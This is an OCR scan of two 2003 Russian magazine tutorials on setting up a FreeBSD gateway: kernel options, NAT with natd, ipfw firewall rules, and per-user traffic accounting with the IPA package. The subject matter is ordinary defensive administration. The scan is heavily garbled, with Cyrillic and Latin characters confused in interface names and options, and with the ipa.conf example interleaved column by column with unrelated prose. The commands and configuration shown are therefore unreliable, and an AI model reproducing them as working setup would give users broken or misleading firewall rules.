во записываемых в лог пакетов, 
чтобы Norv не переполнились); 
options ТСР_ОКОР_$УМАМ 

(не принимает пакеты с байтами 
SYN и FIN, как ты знаешь, сущест- 
вует целый тип атак на основе 
SYN+FIN пакетов). 

Существует еще масса дополни- 
тельных фишек (можно частично 
запретить протокол ICMP, тем са- 
мым снизив возможность флуда, 
но эти вещи выходят за пределы 


ps@)service.ru 


данной статьи). Если хочешь по- 
больше узнать о ядре freebsd, чи- 
тай файл ИМТ (в той же директо- 
рии, что и GENERIC) + man ipfw + 
man аиттупе и, разумеется, 
FreeBSD Handbook 
(http://www.freebsd.org/doc/ 
en_US.ISO8859-1/books/handbook/ 
firewalls.html). 

Компилим ядро: config xakep, потом 
переходим в директорию 
/usr/src/sys/compile/xakep, потом 
make, make install. Если все проходит 
гладко, новое ядро создастся в кор- 
не под именем kernel, при этом ста- 
poe ядро получит имя kernel.old (но 
кроме них еще будет default ядрыш- 
ко - kernel.GENERIC). Hy что, reboot? 

Если новое ядро прогрузилось - то 
все ок, если же полезли ошибки - 
загрузи ядро “no умолчанию”. Это 
делается, когда в самом начале при 
загрузке freebsd появляется Hag- 
пись “Booting [kernel] т 9 sec- 
onds...” - нажимай ESC и в появив- 
шейся строке пиши “unload” (тем 
самым ты выгрузишь модули от но- 
вого ядра) и “boot /kernel.GENERIC". 


Я ЛЮБЛЮ САМ ПРОЦЕСС 
Конфигурируем МАТ. В файл 
/etc/rc.conf пишем строки: 


gateway_enable="YES" 
(благодаря этой строке мы получа- 
ем возможность делать forward na- 


Www. psyservice.ru - ежедневное обновление 


Не знаешь, 
как подойти к 
такому зверю, 
как FreeBSD - 
читай статью 

- “FreeBSD 

4.3 step by 

step” 
(http://www. 
xakep.ru/ma- 
gazine/xa/ 

040/058/ 

1.азр). 


Если хочешь 
побольше 
узнать про 
историю UNIX 
- обязательно 
посети сайтик 
http://www. 
levenez.com/ 
unix/ 


yIOMp UDO 
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Если хочешь 
побольше уз- 
нать о ядре 
freebsd и по- 
вышении его 
$есиге-истос- 
ти, читай 
файл ЫМТ (в 
той же дирек- 
тории, что и 
GENERIC) + 
man ipfw + 
man dummy- 
net, ну и, ра- 
зумеется, 
FreeBSD 
Handbook 


кетов, то есть машина выступает 
как роутер); 
defaultrouter="212.212.212.211" 
(тут должен быть ip-agpec роутера 
твоего провайдера, то есть узел, 
который выше тебя, спроси у про- 
ва, он скажет); 
natd_enable="yes” 
(включаем демон natd); 
natd_interface="xI1" 
(тут прописан внешний интерфейс, 
на котором и будет тусоваться МАТ); 
tcp_drop_synfin="NO" 
(хоть мы и включили блокировку па- 
кетов с байтами systfin, пользовать- 
ся пока ею не будем, вот когда раз- 
берешься - поменяешь NO на YES). 

С rc.conf мы закончили (читай 
пап rc.conf). Теперь давай разбе- 
ремся, как задавать и работать с 
правилами ipfw. Разумеется, они 
все (или почти все) уже описаны в 
man ipfw, но я дам тебе установку. 

С помощью команды ipfw -a list 
(более короткий вариант ipfw |) мы 
получим список правил. Каждое 
правило (оно же rule) представляет 
собой какую-либо инструкцию для 
ipfw. Для начала давай разберем- 
ся, что мы можем делать с пакета- 
ми, которые принимаем. Всего для 
ipfw существует несколько правил: 

reject - отбрасываем принятый па- 
кет и информируем хост (который 
послал нам этот пакет), что наш 
узел недоступен (путем посылки 
ICMP сообщения “host unreachable” 
или “port unreachable"); 

allow - разрешаем принятие nake- 
та (или pass, или accept); 

deny - запрещаем принятие паке- 
та без информирования по ICMP; 

count - ведет подсчет пакетов 
(очень часто используется для сня- 
тия статистики, когда запрещать/раз- 
решать не требуется, а надо просто 
получить информацию, сколько па- 
кетиков использует тот или другой 
узел). Весь список правил выполня- 
ется от меньшего к большему, то 
есть сначала выполняется первое 
правило, а в конце последнее (обыч- 
но оно имеет номер 65535). 


Задаем правила для “почты”... 


А что мы будем разрешать или 
запрещать? В ipfw пакеты делятся 
на четыре группы: TCP, UDP, ICMP, 
all - если с первыми тремя все по- 
нятно, TO “а!” (оно же ip) - это все 
протоколы. То есть, допустим, тебе 
надо разрешить для какого-то хос- 
та только одну аську - ты и разре- 
шаешь только Udp протокол по Ka- 
кому-либо определенному порту 
(обычно 5190), а другой хост дол- 
жен иметь право не только болтать 
по аське, но и ползать по web'y и 
качать файлы с Ир-серверов - вот 
ему-то мы и позволяем использо- 
вать “все протоколы", то есть в 


правилах назначаем “all” (или “ip"). 


Для того чтобы задать правило, ис- 
пользуем команду ipfw add, чтобы 
удалить - ipfw del. Трафик делится на 
два вида - входящий и исходящий. 
Бывает необходимо указать интер- 
фейс для работы (в нашем случае 
xlO или ХИ), это делается с помощью 
префикса via. Для того чтобы твой 
комп использовался как шлюз, мало 
запустить демон natd, требуется еще 
перенаправить ему трасфик исходя- 
щего интерфейса, то есть в нашем с 
тобой случае делаем: ipfw add 20 
divert natd all from any to any via xl 


НЕМНОГО ПРАКТИКИ 

Набери команду ipfw -a list и уви- 
дишь, что под номером 65535 кро- 
ется правило “deny ip from any to 
any". Что OHO означает? Расшиф- 
ровываем по порядку “запретить 
любой трафик по любым протоко- 
лам от любого хоста к любому хос- 


Результат применения ipfw add allow ip from any to any 


ГЕЕВ 


ЕЛЕ 08(33) 2003 


...и проверяем (внешний интерфейс 
в данном примере не х1, а ed1) 


Ty". То есть в этом случае мы не 
можем вообще работать с сетью и 
даже пропинговать собственный 
хост. Попытайся: ping 127.0.0.1 или 
ping 192.168.6.12 - ответ “permission 
denied”, что в принципе логично. 
Разрешим все в сети, для этого на- 
берем: ipfw add 100 allow ip from 
any to any. Смотрим ipfw -a list - у 
нас уже два правила. 

Самое гиблое в манах по-моему - 
это то, что они офигительно объяс- 
няют теорию, но практику - ни-ни... 
Сейчас я дам тебе несколько полез- 
ных примеров, на основе которых ты 
сможешь написать для себя и своей 
сети туеву хучу новых рулесов. 


Пример 1: ipfw add 8000 deny ip 
from 192.168.0.55 to any 80 via ХИ - 
создаем правило с номером 8000, 
запрещающее открывать сайты 
www (порт 80) хосту с ip-agpecom 
192.168.0.55 в Интернете. Заметь, 
что если сайт открыт на другом 
порту (например, 8080) и правил, 
запрещающих это, нет, то чел смо- 
жет спокойно открыть свою стра- 
ничку. Следовательно делаем вы- 
BOG, что вся защита задается по 
портам и нет какой-либо проверки 
контента. Кроме того, если на са- 
MOM роутере находится web-cepBep, 
то 192.168.0.55 может спокойно с 
ним работать, так как он откроется 
через интерфейс х!О. 

Пример 2: ipfw del 8000 - убираем 
это правило. 

Пример 3: ipfw add allow {ср from 
any to 192.168.0.55 2000-2100 - раз- 
решаем tcp трафик от любого хоста 
в Интернете к хосту 192.168.0.55 с 
2000 по 2100 порт. 

Пример 4: ipfw add 9200 count tcp 
from pop.mail.ru 110 to 192.168.6.200 
via xl1 - подсчитаем, сколько почты 
скачивает хост с ip 192.168.6.200 с 
сервера тай.ги. В данном случае 
мы подсчитываем все по протоко- 
лам pop3, а если учитывать еще и 
imap4, то пример 4 будет выгля- 
деть так: 
ipfw add 92 count tcp from pop.mail.ru 
110,143 to 192.168.6.200 via хИ 
(так как imap4 использует порт 143). 

Ты понял, почему в правиле 4 мы 
указываем интерфейс? Если в пра- 
Bune 4 мы его не укажем, то тра- 
фик будет считаться два раза (сна- 
чала он пройдет через интерфейс 


НОМ/ТО/САМЫЙ СЕРЬЕЗНЫЙ ГЕЙТ 


Правила, которые у нас получились 


хИ - потом xlO). А если ты хочешь 
узнать, сколько ты отсылаешь поч- 
ты, тогда пример 5: ipfw ада 94 
count tcp from 192.168.6.200 to 
smtp.mail.ru 25 ма xlO. 

Допустим, многие (или все) пра- 
вила ты захотел отменить - вводи 
команду ipfw -f Пи$п, и все правила, 
кроме последнего (65535 deny ip 
from any to any), удалятся. После 
того как очистил все правила, не 
удивляйся, что шлюз больше не 
функционирует - правило 20 (divert 
natd all from any to any via хМ) тоже 
исчезло. 


to any 

/sbin/ipfw add 300 allow ip from 
192.168.6.200 to any 

/sbin/ipfw add 310 allow ip from any to 
192.168.6.200 via хИ 

/sbin/ipfw add 320 allow ip from any to 
192.168.6.200 via xl0 

/sbin/ipfw add 400 allow ip from 192.168.0.55 
to any 
/sbin/ipfw add 410 allow ip from any to 
192.168.0.55 via хП 

/sbin/ipfw add 420 allow ip from any to 
192.168.0.55 via xl0 

/sbin/ipfw add 65000 allow ip from 
222.222.222.222 to any 


eee 


если ты хочешь посмотреть какое-то определенное правило - тебе не 
обязательно поднимать все командой ipfw -a list, ты можешь просто 
задать ipfw show и номер нужного тебе правила. Пример (чтобы 


посмотреть правило 45): ipfw show 45. 
ar 


ПОГРУЖЕНИЕ 

Наверное, ты заметил, что все пра- 
вила хранятся в оперативной памя- 
ти компа, то есть при случайной пе- 
резагрузке (или не случайной) 
весь твой труд будет уничтожен. 
Непорядок. Изменим это. Все наст- 
ройки для ipfw задаются в файле 
/etc/rc.firewall. Используя файл 
rc.conf + ОПЦИЮ 
firewall_type="/usr/local/etc/fire- 
wall.conf", ты можешь сделать свой 
конфиг firewall’a (firewall.conf), из 
которого уже будут браться руле- 
сы, но я обычно просто вставляю 
их в конец gecpontHoro rc.firewall. У 
нас должно получиться в несколь- 
ко правил (не забудь, что нам надо 
еще защитить внутреннюю сеть от 
посягательств): 


/sbin/ipfw -f flush 

/sbin/ipfw add 20 divert natd all from any to 
any via xll 

/sbin/ipfw add 40 deny tcp from any to any 

135-139 via хП 

/sbin/ipfw add 45 deny tcp from any 135-139 


Прогрузим правила: sh /etc/rc.fire- 
wall. Смотрим ipfw -a list. 

Если ты He понял, давай разберем, 
что мы тут написали: правила №40 и 
45 запрещают вход и выход по нетбио- 
су (что есть хорошо - зачем локальной 
сети выход в Инет по нетбиосу). Для 
каждого внутреннего ip-agpeca мы соз- 
даем 3 правила. Для ip-agpeca 


4, 
FreeBSD : 


ия равновесия 


обязательно прочитай (на картинке 2-ое 
издание - не перепутай с первым) 


192168.6.200 правило номер 300 разре- 
шает выход в Интернет, а правила 310 и 
320 позволяют обращаться к этому хос- 
ту из Интернета по интерфейсам хЙ и хЮ 
(без этих правил хост мог бы просто пос- 
лать запрос к какому-либо серверу, но 
получить ответ от него не имел бы 
прав). Rule 65000 дает право роутеру 
отсылать пакеты от себя. Заметь, что тут 
обязательно надо указывать ip внешне- 
го интерфейса, а не сам интерсрейс. Бла- 
годарю тому, что у нас на каждый хост 3 
специфических правила - посторонний 
(не прописанный) хост не может подклю- 
читься к твоей сети, то есть подключить- 
ся он сможет, но выйти в Инет нет (разу- 
меется, до тех пор, пока ты для него не 
вобьешь эти три правила, тем самым 
разрешив ему доступ на роутере). 


подводим итоги 

Я надеюсь, мой маленький пушистый 
друг, ты понял, какие прекрасные свя- 
щенные бонусы сулит нам использо- 
вание FreeBSD в наших коварных 
планах, поэтому переворачивай стра- 
ницу и наслаждайся второй статьей 
из трилогии. Поверь, ты узнаешь еще 
очень много интересного. 
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Одна из самых 
лучших книг 
по freebsd (на 
русском языке) 
- FreeBSD Ag- 
министрирова- 
ние: искусство 
достижения 
равновесия 
(изд. Diasoft). 
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ОСи 4work 


Мне He Hpa- 
вится виндоу- 
совский под- 
ход - вот вам 
комбайн, кото- 
рый мелет 
морковку, ко- 
лет деревья, 
лижет задни- 
цу, ходит за 
вас на работу 
- можете нас- 
лаждаться; 
только если он 
вашу задницу 
примет за де- 
рево или за 
морковку - не 
обижайтесь. 


DemiurG (arkhangel@mail.ru) 


динственная трабла 

возникает, когда при- 

дется учитывать, 
сколько каждый юзер выкачивает в 
инете, ведь если такого учета не бу- 
дет - можно будет с легкостью пус- 
тить тебя по ветру... Что же будем 
делать? Правильно - создавать 
свою собственную систему трафика! 


ТРАФИК - СУЩЕСТВО 
ПУШИСТОЕ 

Для начала разберемся, что нам 
требуется создать. Система Tpacpu- 
ка должна: 

1. Подсчитывать, сколько трафика 
конкретный пользователь выкачи- 
вает из интернета и закачивает в 
интернет. Причем делать это проз- 
рачно для пользователя. Т.е. не 
доставлять ему (юзеру) никаких не- 
удобств. За отмазы типа “у нас ра- 
ботает системы трафика, поэтому 
1са пользоваться нельзя" - 
расстрел... 

2. Работать централизованно (не 
зря же мы ее ставим на роутер 
FreeBSD). Это я пишу к тому, что 
есть некоторые админы, которые 
считают, что простые решения - 
есть эффективные решения. И поэ- 
тому, если боссы требуют от них, 
чтобы считался трафик по пользо- 
вателям, эти админы ставят на ло- 
кальные компы юзеров какие-то 
убогие программки и потом имеют 
офигительный геморрой, бегая от 
юзера к юзеру. Да и юзеры тоже не 
дураки, и исподтишка убить и заму- 
чить эту убогую программку им в 
радость. Аминь. 

3. Не существует глобального об- 
щего решения (равно как и алго- 
ритма), как считать Tpacpuk. Вари- 
антов, на чем реализовывать систе- 
му и чем считать пакетики, дофига 
(чуть ниже я рассмотрю основные). 
Каждый админ в своей ситуации ре- 
шает сам. Кому-то хватает того, что 
уже сделано до него, кто-то пишет 
новые системы сам. 

4. Должен быть интерфейс, через 
который админ может посмотреть, 
сколько у каждого юзера накапало. 
Как он будет реализован, решать 
админу. Кому-то достаточно подк- 
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лючения по ssh и банального pac- 
печатывания в файл (или на прин- 
тер) заветных циферок. Кто-то пи- 
шет отдельный клиент на языках 
высокого уровня либо банальный 
меб-интерфейс, который позволяет 
не только админу, но и пользовате- 
лям с боссами без вмешательства 
сисада узнать, сколько они скачи- 
вают и закачивают в инет. 

5. Система трафика НЕ ДОЛЖНА 
учитывать, какие конкретно ресурсы 
пользователи смотрят в интернете. 
Этим должна заниматься система 
мониторинга, но отнюдь не трабрика. 
Кроме того, мы честные админы и за 
пользователями не шпионим. Пусть 
этим занимаются другие люди (им за 
это деньги платят). 

6. Система трафика может отли- 
чать (а может и не отличать) русский 
трафик от иностранного. Просто бы- 
вает такая ситуация, когда цена за 
русский трафик одна, а за иностран- 
ный в два раза больше, и возникает 
вопрос, как же его считать. Для тех, 
кто в танке: если сервак входит в 30- 
ну .ги, это вовсе не означает, что он 
находится на территории постсоветс- 
кого пространства (верно и обратное 
утверждение). В нашем случае я не 
отличаю русский и иностранный тра- 
фик, так как это дело очень не три- 
виальное и к стандартным схемам 
(которые я рассматриваю в статье) 
это сложно приделывается. Можно, 
конечно, и изолентой прикрутить, но 
часто отламываться будет, да и ве- 
роятность ошибки очень высока. 


Настольная книга любого UNIX админа 


КТО СКАЧАЛ MAY? 


СИСТЕМА ПОДСЧЕТА ТРАФИКА НА ЕВЕЕВ$О 


1. Пример использования команды 
“ipastat -х -В .” 


Если кому-то это будет интересно, 
читайте про протокол ВСР 
(http://www.cis.ohio-state.edu/ 
cgi-bin/rfc/rfcl772.html). И заодно 
документацию NeTAMS 
(http://www.netams.com/doc/ 
documentation-ru.html). 


7. Система трафика НЕ СЧИТАЕТ 
количество денег за выкачанный 
пользователем трасрик. Этим зани- 
мается система биллинга. Система 
биллинга высчитывает, сколько 
пользователь накачал в кредит или 
сверх меры, высчитывает процент 
(пени), может даже отключить 
пользователя. Мы все этим не за- 
нимаемся, нам нужно просто в кон- 
це месяца получить точные цифры: 
сколько тот или иной юзер выкачал 
из инета, и все... 


ЗАКОН ПАРЕТТО 

Заранее хочу пояснить, что почти 
все нижеприведенные решения мы 
рассматриваем Ha FreeBSD. Ha Ли- 
нухе многие (почти все) просто не 
будут функционировать. В созда- 
нии роутера выбирай лучше 
FreeBSD. Она более надежна и 
быстра, Пинух же имеет смысл ста- 
вить только в том случае, если у те- 
бя сложная нестандартная ситуация 
(допустим, есть два канала в инет, и 
надо, чтобы одни пользователи ла- 
зали по слабому каналу, а другие 
только по быстрому - BO FreeBSD та- 
кая задача решается очень не три- 
виально) либо просто ставить 


фрибздю мешают какие-либо мес- 
течковые религиозные траблы. 


НЕ ПРЕВЫШАЙ СКОРОСТИ 

24 ЧАСОВ В СУТКИ 

На основе чего мы можем считать 
трафик? 


1. Создавать банальные записи 
ipfw count (можно и ipfw add allow 
что-то там, тем самым мы еще и ог- 
раничим доступ различным хостам) 
и потом написать скрипт и аккурат- 
но писать вывод их в файл. Ipfw pa- 
ботает на уровне ядра и уж точно 
не теряет пакеты! Данные получа- 
ются более чем точные (и работает 
все быстро). Но придется писать ка- 
кие-то скрипты, что не есть гуд. 
http://cisco.opennet.ru/base/net/ 
trafcnt.txt.html 
http://www.server.md/articles.php? 
aid=12 


2. trafd (он же bpft). Пытался с ним 
работать. Честно скажу, не было 
времени разбираться (представил, 
как это чудо буду адмнить - покрыл- 
ся потом холодным). Считает паке- 
тики через bpft (этот же пакетный 
фильтр использует сниффер tcp- 
dump). Преимущества: есть в пор- 
тах freebsd; может делать вывод по 
номеру портов и ресурсам, которые 


2. Пример использования команды 
“ipastat -r admin” 


просматривает пользователь; gena- 
ет дампы памяти (после перезагруз- 
ки данные останутся живы); умеет 
делать кучу вещей, которые в пов- 
седневной жизни не особо нужны 
(например, переводить сетевуху в 
promisc mode), так как имеет бли- 
жайшего родственника - tcpdump. 
Недостатки: может терять пакеты 
(если канал скоростной), мне пока- 
залось, что его тяжело настроить и 
админить, возможно я ошибся. 
http://www.opennet.ru/base/net/ 
trafd_stat.txt.html 
http://bpft4.sourceforge.net 


3. NeTAMS - программа для конт- 
роля и учета сетевого трафика (вы- 
держка из документации). Офиги- 
тельная прога, которая считает тра- 
фик, имеет меб-интерфейс (ис- 
пользуя туза! базу). Может счи- 
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тать трафик через прослушивание 
сетевого интерфейса (libpcap/bpf - 
полная аналогия с trafd), через 
ipfw divert куда-то (вспомни ipfw 
divert natd - поймешь, о чем я), че- 
рез NetFlow (это к Cisco). Преиму- 
щества: все в одном; бесплатно; 
вроде бы умеет уже отличать рос- 
сийский трасрик от иностранного 
(через протокол ВСР) - хотя не 
факт; можно админить через telnet. 
Недостатки: я, как начинающий 
UNIX'oug, очень люблю юних за TO, 
что любая сложная система в нем 
работает по кирпичикам, и если 
происходит глюк - легко опреде- 
лить, в каком месте он произошел. 
Мне не нравится виндоусовский 
подход - вот вам комбайн, который 
мелет морковку, колет деревья, ли- 
жет задницу, ходит за вас на рабо- 
Ty - можете наслаждаться, только 
если он вашу задницу примет за 
дерево или за морковку - не оби- 
жайтесь. Мне хотелось самому по- 
пытаться что-то написать/соз- 
дать/сделать, и у меня получилось. 
Возможно у тебя что-то получится 
с NeTAMS - буду очень рад, если - 
да, то пиши в СпецХакер статью - 
сразу же, не откладывая. 
http://www.netams.com/ 
http://www.netams.com/doc/docu- 
mentation-ru.html (документация Ha 
русском, прочитай просто для души 
- много интересного узнаешь). 


4. NetUP UTM 3.0 - просто настра- 
ивать, ничего не пропускает, рабо- 
тает как часы, стоит 200$ (это ми- 
нимальная лицензия). Мне не по 
себе стало что-то. 
http://www.netup.ru/. 

За деньги есть еще LanBilling 
(http://www.lanbilling.ru/noncomm. 
html) - там вроде демка Ha халяву 
есть, если интересно - посмотри. 


5. Варианты: ipcad, ng_ipacct, 
MRTA, MRTG, Ipacc, ipCount, 
IPmeter, tcpstat. Каждая из этих 
программ каким-то ей изведанным 
шаманским способом (как модуль 
ядра, как демон или через SNMP 
(MRTG)) собирает и подсчитывает 
трафик. Я не ставил ничего из вы- 
шеперечисленного. Просто стало 
как-то скучно и тоскливо. У каждо- 
го свои преимущества (возможно, 
если у тебя С15со - тебе подойдет 
сбор данных no Simple Network 
Management Protocol, но это He 
наш случай). Недостатки: никто не 
гарантирует тебе, что из вышепере- 
численных модулей/демонов хоть 
какой-то считает более-менее точ- 
но, одни хвалят одно - другие gpy- 
гое, есть из чего выбирать (ведь 
можно и с прокси-сервера SQUID 
статистику забирать, но это, согла- 
сись, изврат). Этим списком я хотел 
показать, что есть какие-то другие 
решения, и если первые четыре 
пункта тебя не устроили - ты мо- 


жешь на базе вышеперечисленно- 
го создать свою систему трафика, и 
будешь молодец. А я умываю руки. 
http://www.opennet.ru/base/fag/ 
fag_traf2.txt.html (faq по системам 
подсчета). 


6. IPA (IP Accounting Software) - 
BOT на ней, родимой, мы и будем 
создавать нашу систему. Преиму- 
щества: сами IPA ничего не счита- 
ют - они (скрипты) используют пра- 
Buna ipfw, которые уже задает ag- 
мин; имеют свою убогую текстовую 
базу (то есть при перезагрузке дан- 
ные не потеряются); умеют склады- 
вать/вычитать правила; очень хо- 
рошая документация; имеют sql- 
\меБ-интерфейс, который не работа- 
ет (было написано письмо автору 
патча - ответа не последовало). Не- 
достатки: все, присущие ipfw, так 
как сами ipa мало что делают; че- 
ресчур убогая текстовая база, для 
того чтобы изменить в ней значе- 
ние, надо очень постараться. Нес- 
мотря на это, прога хорошо работа- 
ет, не падает и имеет массу фише- 
чек которые мы и рассмотрим. 


http://ipa-system.sourceforge.net/ 


3. Пример использования команды 
“ipastat -R admin” 
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В любом слу- 
чае читай ма- 
ны к IPA, там 
все настолько 
четко и ясно 
объяснено, что 
просто душа 
радуется (сто- 
пудняк). 


Есть вопро- 
сы - обяза- 
тельно иди на 
http://www. 
opennet.ru. 
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Первым делом прочитай там все, Правила, по которым будет счи- 
что тебе надо (если я пишу “тап 8 таться трафик в данном случае, - 
ipa”, то я имею в виду файл 300 и 310 (320 служит для разре- 


ipa.8.txt): шения доступа по внутреннему ин- 

ttp:/ | терфейсу). В нижеследующем кон- 
фриге я создал еще и юзера “all”, 

через которого мы подсчитаем тра- 

фик для всей сети по всем пользо- 

вателям, просто складывая номера 

их правил - очень удобно, советую. 


> 
= 
$ Пример реального файла ipa.conf: 
+ h kirill.alphaclub.n rav.html- = # в секции global задаются какие-либо 
Ps} patch sqit+web интерфейс. У меня глобальные правила. 
о поставить (чтоб работало) не полу- global { 

чилось. + означает, что данные в базе обновля- 

ются каждые 5 минут. 5. Возможности ключа -К налицо 


НАХ-НАХ, НЕХ-НЕХ И ПОХ-ПОХ —=update_db time = 5m 


Скачиваем архив (В р:/, | } искать бы монитор для роутера (так как 
m.sourceforge.net/ipa-1.3.1.tar.gz), + когда ты запускаешь IPA командой ipa, — доступ к нему извне по сети был бы наглу- 
разархивируем (tar -xvfz ipa- первым делом прогружаются данные, на- хо закрыт). 
1.3.1.tar.gz). Уже появился билд 1.3.4 — ходящиеся в секции Startup. exec = /sbin/ipfw add 5 allow all from any to 
(но для примера я все бацаю Ha startup { any via х!0 
1.3.1). Ставим скрипты: make, make ЕН очищаем таблицу рулесов ipfw. exec = /sbin/ipfw add 25 deny ip from any to 
install. Читаем документацию (обя- exec = /sbin/ipfw -f flush any 
зательно). Основной конфигураци- = ехес = /sbin/ipfw add 20 divert natd all from } 
онной файл ipa - /usr/local/etc/ any to any via хП ## правила для админа. 
Брандмауэры ~—ipa.conf (по умолчанию существует — ## запрещаем извне порт 3306 (mysq)). rule admin { 
Gates Бы файл ipa.conf.default, переименуй exec = /sbin/ipfw add 35 deny tcp from any = ## просто информационная строка, может 
мые вопросы его в ipa.conf). Сама база пишется to any 3306 via хП быть написано все что угодно, очень часто 
(Чаво): | в каталог /var/ipa/"user пате"/"но- — ехес = /sbin/ipfw add 37 deny tcp from апу — служит как напоминание и будет просто 
анны мер месяца". Система такова: у нас 3306 to any via хИ необходима, когда мы начнем писать 
есть сеть с 3 пользователями и со- — ## запрещаем netbios порты 138-139 (135- скрипты для трафика. 
ответствующими р-адресами: 137 порты тоже стоит запретить на всякий info = 192.168.6.200 
случай, они используются в специфичес- ipfw = 190 195 
admin - 192.168.6.200 ких микросостовских программках). startup { 
masha - 192.168.6.210 exec = /sbin/ipfw add 40 deny tcp from any HH мы считаем трафик по правилу 190 
gosha - 192.168.6.234 to any 135-139 (сколько мы отсылаем) и по правилу 195 
exec = /sbin/ipfw add 45 deny tcp from any (сколько мы закачиваем), правила 185 и 
Для каждого из них мы создаем 135-139 to any 187 служат для работы no ssh (так как они 
по три правила, которые не просто #4 разрешаем отсылать порты от роутера. = лежат раньше 190, 195, по ним трафик не 
подсчитывают трасфик, но разреша- _ exec = /sbin/ipfw add 65000 allow ip from считается). 
ют выход их компам в сеть (почему — 212.212.212.212 to any exec = /sbin/ipfw add 185 allow tcp from 
так, смотри предыдущую статью } 192.168.6.200 to 192.168.6.22 22 
про конфигурирование freebsd). ## когда ты убиваешь ipa (команда ipa -k exec = /sbin/ipfw add 187 allow tcp from 
Данные no роутеру мы также ос- shutdown), выполняется секция shutdown. — 192.168.6.22 22 to 192.168.6.200 
тавляем без изменений. shutdown { exec = /sbin/ipfw add 190 allow ip from 
Данные gna Маши: #H очищаем таблицу рулесов ipfw. 192.168.6.200 to any via xl0 
exec = /sbin/ipfw -f flush exec = /sbin/ipfw add 195 allow ip from any 
ipfw add 300 allow ip from 192.168.6.210 to any + ## разрешаем внутренний интерфейс. Бы-  10192.168.6.200 via хИ 
ipfw add 310 allow ip from any to вает, очень часто требуется, когда работа- — ехес = /sbin/ipfw add 197 allow ip from any 
192.168.6.210 via xi1 ешь с роутером, удаленно по ssh надо to 192.168.6.200 via х!0 
ipfw add 320 allow ip from any to убить все правила (или просто отключить } 
192.168.6.210 via xl0 IPA). Если бы He это правило, тебя бы } 
просто выбросило из PUTTY, и пришлось rule masha { 
1 i 1 Е если 


хочешь узнать 
об ipf больше 
- читай. 


4. На скрине видны отличия команд “ipastat -r admin -i 6. Проверяем, какие у нас существуют правила и прогружаем 
2003.07.07" и “ipastat -R admin -i 2003.07.07” ipa. Изменения - налицо. 
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info = 192.168.6.210 

ipfw = 300 310 

startup { 

exec = /sbin/ipfw add 300 allow ip from 
192.168.6.210 to any 

exec = /sbin/ipfw add 310 allow ip from any 
to 192.168.6.210 via хИ 

exec = /sbin/ipfw add 320 allow ip from any 
to 192.168.6.210 via xl0 

} 

## gna примера приведена секция shut- 
down (хотя когда у нас есть глобальная 
секция shutdown, эта теряет всякий 
смысл) 

shutdown { 

exec = /sbin/ipfw delete 300 

exec = /sbin/ipfw delete 310 

} 

} 

rule gosha { 

info = 192.168.6.234 

ipfw = 400 410 

startup { 

exec = /sbin/ipfw add 400 allow ip from 
192.168.6.234 to any 

exec = /sbin/ipfw add 410 allow ip from any 
to 192.168.6.234 via xl 

exec = /sbin/ipfw add 420 allow ip from any 


7. Тест конфига прошел успешно... 


to 192.168.6.234 via xl0 

} 

} 

rule all { 

info = 255.255.255.255 

ipfw = 190 195 300 310 400 410 
} 


Ну что, вбил правила? Теперь 
разберемся, как их вывести на эк- 
ран. В IPA этим занимается команда 
“ipastat”. Как всегда, будем на при- 
мерах разбираться? 

Пример 1: “ipastat -х -К .” - выво- 
дит информацию по всем пользо- 
вателям за текущий месяц работы 
(ключ -х позволяет использовать 
регулярные выражения - примеры 
использования см. “man 8 ipastat”) 
[рис. 1]. 

Пример 2: “ipastat -r admin" - вы- 
водит статистику за текущий месяц 
работы по пользователю admin и 
делает разбивку по дням [рис. 2]. 

Пример 3: “ipastat -R admin” - вы- 
водит статистику за текущий месяц 


HOWTO/KTO СКАЧАЛ MAY? 


работы по пользователю admin и не 
делает разбивки по дням [рис. 3]. 

Пример 4: “ipastat -r admin -i 
2003.07.07" - выводит статистику 
по админу за 7 июля [рис. 4]. 


По умолчанию (как ты заметил) 
IPA в таблице выводят данные в 
байтах и мегабайтах, но данные в 
мегабайтах получаются делением 
данных в байтах не на 1000000, а 
на 1048576=1024*1024, что как-то 
немного бесит - легко исправляет- 
ся, если еще указывать ключ -К. 
Пример 5: “ipastat -R gosha -1 
2003.07.02 -k" - вывод по трафику 
для юзера Гоша за 2 июля, счита- 
ем, что мегабайт равен 1000 кило- 
байтам [рис. 5]. 

В любом случае читай маны к IPA, 
там все настолько четко и ясно 
объяснено, что просто душа раду- 
ется (стопудняк). Кроме умения 
пользоваться ipastat тебе обяза- 
тельно надо понять принцип рабо- 
ты команды “ipa”. Команда “ipa” 
полностью управляет самой систе- 
мой; если ты в самом начале просто 


введешь “ipa”, то загрузятся все 
правила, которые есть в секциях 
startup, кроме того, ipa подгрузит 
базу, и твоя система трафика нач- 
нет работать [рис. 6]. 


Если что-то пошло не так, запусти ipa 
с ключом t:"ipa -t” - проходит тест кон- 
фига (/usr/local/etc/ipa.conf) [рис. 7]. 

Разумеется, ipa выловит только те 
ошибки, которые проходят на ее 
уровне, а если у тебя какое-то пра- 
вило некорректно или синтаксичес- 
ки неверно построено, это пройдет 
незамеченно. Команда “ipa -k shut- 
down” - выполняет секцию shut- 
down для всех правил, включая 
global секцию; сохраняет последние 
значения в базе и убивает процесс 
ipa [рис. 8]. 

Команда “ipa -k dump" - обновля- 
ет последние значения в базе, HO 
не создает новой записи. Чтобы 
все прогрузки правил четко фикси- 
ровались, добавь в файле /etc/sys- 
log.conf строку: 


lipa 
* *<TAB>/var/log/ipa.log 


И обязательно создай в директо- 
рии “/var/log/" драйл ipa.log (touch 
/var/log/ipa.log). 


О ЧЕМ Я УМОЛЧАЛ 

Во FreeBSD (начиная с версии 4.3) 
существует еще один файрволл - 
называется ipf. Работает во многих 
ситуациях быстрее, чем ipfw, и ис- 
пользует многие возможности, ко- 
торых в ipfw просто нет (взять хотя 
бы redirect из внешней сети BO 
внутреннюю). Пишу я все к тому, 
что многие продвинутые админы 
уже забацали свои сети на основе 
ipf uv теперь не знают, чем считать 
траффик. Хочу успокоить вас - IPA 
умеет считать трафик не только че- 
рез FreeBSD ipf, но и через 
OpenBSD pf (эти пакетные фильтры 
немного отличаются). К сожалению, 
готового конфиг-файла я вам не 
покажу (не буду же я тешить ваше 
уязвленное самолюбие и перестра- 
ивать собственную сеть). Если 


8. Пример использования команды “ipa -К shutdown” 


очень интересно, читай “man 5 
ipa.conf". Кроме того, в данной 
статье совершенно не рассмотрен 
подход подсчета Tpacpuka Ha VPN. 
Написал я это не зря, так как gan 
вам (надеюсь), покорным неодфитам, 
дополнительный повод для раз- 
мышлений и шевеления мозгами. 


ЖИЗНЬ НЕ УДАЛАСЬ, HO ПО- 
ПЫТКУ ЗАСЧИТАЛИ 

Ну, вот вроде и все. Обязательно 
прочитай ссылки на все, что я тебе 
